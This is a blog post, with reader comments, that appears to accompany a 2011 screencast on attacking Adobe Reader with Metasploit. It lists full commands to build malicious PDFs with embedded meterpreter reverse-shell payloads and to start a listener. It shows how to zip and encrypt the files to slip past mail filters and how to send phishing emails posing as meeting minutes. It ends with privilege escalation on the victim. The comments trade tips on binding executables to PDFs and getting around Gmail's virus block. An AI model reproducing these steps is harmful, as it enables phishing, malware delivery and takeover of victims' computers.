Watch video on-line: http://g0tmi1k.blip.tv/file/4924026
Download video: http://www.mediafire.com/?h7lab2h1p1369id
Brief Overview
This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files , the attacker creates two PDFs (one relies on no user interaction and crashes the reader whereas the other one require the user to click through a few warning screens, however is then presented with a document).
The attacker emails these documents to the target (however they have to compress & encrypt the documents).
What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* A PDF document (Either create your own or can be found by using an internet search engine).
* The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here
Method
* Start network services and obtain an IP address
* Run metasploit and search for PDF exploits
* Configure exploit and create a vulnerable file
* Compress and encrypt PDF
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over
* Locate a "legit" PDF document and bind with exploit
* Compress and encrypt PDF document
* Socially engineer an email to the target and attach file
* Wait for target to download and open file
* Game Over ...again
Commands:
start-network dhclient eth0 msfconsole search pdf use windows/fileformat/adobe_libtiff info show options set FILENAME evil.pdf setg OUTPUTPATH /root setg PAYLOAD windows/meterpreter/reverse_tcp setg LHOST 192.168.0.33 setg LPORT 4444 show options exploit use exploit/multi/handler show options exploit zip meeting.zip evil.pdf sendEmail -f "Attacker<[sender]AT[sender].[sender]>" -t [target]AT[target]DOT[target] -u "Top secret stuff" -m "Here are the minutes from the last meeting." -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] zip -e meeting.zip evil.pdf g0tmi1k g0tmi1k sendEmail -f "Attacker<[sender]AT[sender].[sender]>" -t [target]AT[target]DOT[target] -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] #Firefox -> Google-> filetype:PDF magic ponies -> Save: good.pdf #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open use windows/fileformat/adobe_pdf_embedded_exe info show options set FILENAME evil2.pdf #set EXENAME evil.exe #ENCODE set LAUNCH_MESSAGE Be sure to re-save when shown and then click open. set INFILENAME /root/good.pdf show options exploit use exploit/multi/handler show options exploit -j zip -e meeting2.zip evil2.pdf g0tmi1k g0tmi1k sendEmail -f "Attacker<[sender]AT[sender].[sender]>" -t [target]AT[target]DOT[target] -u "Top secret stuff v2" -m "If you can't open the first email, try this one. The password is: g0tmi1k" -a /root/meeting2.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open sessions -l -v sessions -i 2 sysinfo getuid getsystem getuid
Walk-through
The attacker approaches this attack similar to a previous method, however instead of producing a collection of different files, which are not going to be used, they choose to use a program which is very commonly installed (also not updated often too!), Adobe Reader.
To start things going, the attacker starts their network connection and runs metasploit. When metasploit is ready, they search it's database for known exploits for PDFs files. "windows/fileformat/adobe_libtiff" has the latest Disclosure Date (2010-02-16) to today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable version of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.
The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.
Like before, the attacker chooses to socially engineer the target by sending them an email, however this time around wants they to attach the file instead of linking to it.
The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to see the PDF the SMTP disallows the PDF attachment. The attacker compresses and encrypts the PDF which will prevent detection (The attacker alters the original message to include the password).
The attacker can sit back and relax until the target opens the PDF document... which the target does =). However! When the target opens the PDF document, the reader "crashes" before they could read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...
This time, the attacker wants to "bind" an exploit to the "legit" PDF. So after searching metasploits database, they locate "windows/fileformat/adobe_pdf_embedded_exe".
Again, the attacker then proceds to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do except to wait for the target to open the document...
After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document so they just click next... After reading the message (2), they click on "open". After doing those steps the target is able to read the document...
...meanwhile the exploit has worked and the attacker has another meterpreter shell on the targets machine.
(1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used
(2) The message is what the attacker left ;)
Notes:
* You will need to find/use your own SMTP details.
* Avast anti-virus detected the PDFs (2011-03-23), other Anti-Virus may as well.
Song: New Zealand Shapeshifter - The Touch (Netsky remix) & New Zealand Shapeshifter - Lifetime (Logistics remix)
Video length: 9:07
Capture length: 32:22
Capture length: 32:22
Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-metasploit-vs-adobe-pdfs.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/39001-%5Bvideo%5D-metasploit-vs-adobe-pdfs.html#post192420
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/39001-%5Bvideo%5D-metasploit-vs-adobe-pdfs.html#post192420
I appreciate your efforts
ReplyDeleteThank u Very Much
Nice share.
ReplyDeleteheyyyy g0tmi1k good job :D, I have a problem with the configuration of smtp email, when I tray send the email and attachment in the shell with sendEmail and gmail, gmail answer that can't send the email because probably content virus hahaah, wot smtp server can I use for send the email and attachments, thx
ReplyDeletestreaming10
@UnusualNinja & @Enc0de
ReplyDeleteThanks for the thanks! =)
@streaming
Thanking you! =)
Well if you watch the whole video, you can see the same issue happens to the attacker. To bypass this, they compressed and encrypted the document - therefore it can't be opened by any program unless it knows the password.
Regarding SMTP, like it says in the blog post:
"* You will need to find/use your own SMTP details."
Nothing To Say about it... Fantastic Job.
ReplyDeletehey Can i bind my Server file to PDF can you please Provide me Some Commands that Could be use to Bind a Simple Exe to Pdf ... "Using BT4"
@Submeyar
ReplyDeleteThanks for the thanks. I'm glad you enjoyed it =)
Do you mean something like this?
http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe